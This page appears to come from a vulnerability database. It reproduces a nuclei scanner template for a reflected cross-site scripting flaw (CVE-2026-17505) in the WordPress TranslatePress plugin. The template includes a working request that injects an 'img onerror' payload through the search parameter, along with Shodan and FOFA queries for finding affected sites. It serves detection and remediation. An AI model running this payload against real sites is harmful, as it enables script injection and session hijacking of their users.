Lucene search
+L

WordPress TranslatePress < 3.2.6 - Cross-Site Scripting

🗓️ 07 Aug 2026 20:01:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

TranslatePress for WordPress below 3.2.6 has reflected XSS in translation markers, enabling JavaScript.

Related
Refs
Code
id: CVE-2026-17505

info:
  name: WordPress TranslatePress < 3.2.6 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    TranslatePress plugin < 3.2.6 for WordPress contains a reflected cross-site scripting vulnerability in the translation marker processing feature, letting attackers inject and execute arbitrary JavaScript code, exploit requires no authentication or privileges.
  impact: |
    Attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking and account takeover.
  remediation: |
    Update to version 3.2.6 or later of TranslatePress plugin.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-17505
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-17505
    epss-score: 0.00372
    epss-percentile: 0.29907
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: cozmoslabs
    product: translatepress-multilingual
    framework: wordpress
    shodan-query: http.html:"translatepress"
    fofa-query: body="translatepress"
  tags: cve,cve2026,wordpress,wp-plugin,wp,translatepress,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "translatepress") || contains(body, "trp-language-switcher")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lang
        part: body
        group: 1
        internal: true
        regex:
          - 'rel="alternate"\s+hreflang="[a-zA-Z-]+"\s+href="https?://[^/"]+/([a-z]{2,3})/"'

  - raw:
      - |
        GET /{{lang}}/?s=%23!trpst%23img%20src=x%20onerror=alert(document.domain)%23!trpen%23 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src="x" onerror="alert(document.domain)">'
          - 'search'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022002dd56fb8a644d37e326145ccec4943fabc0d0b6684b226bf462cf2aba2b90ab0220397bf812f83d0ff579c873424e300c354f98d3af1cc402d00f2880e0c8157b73:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2026 01:30Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.16.1
EPSS0.00672
SSVC
4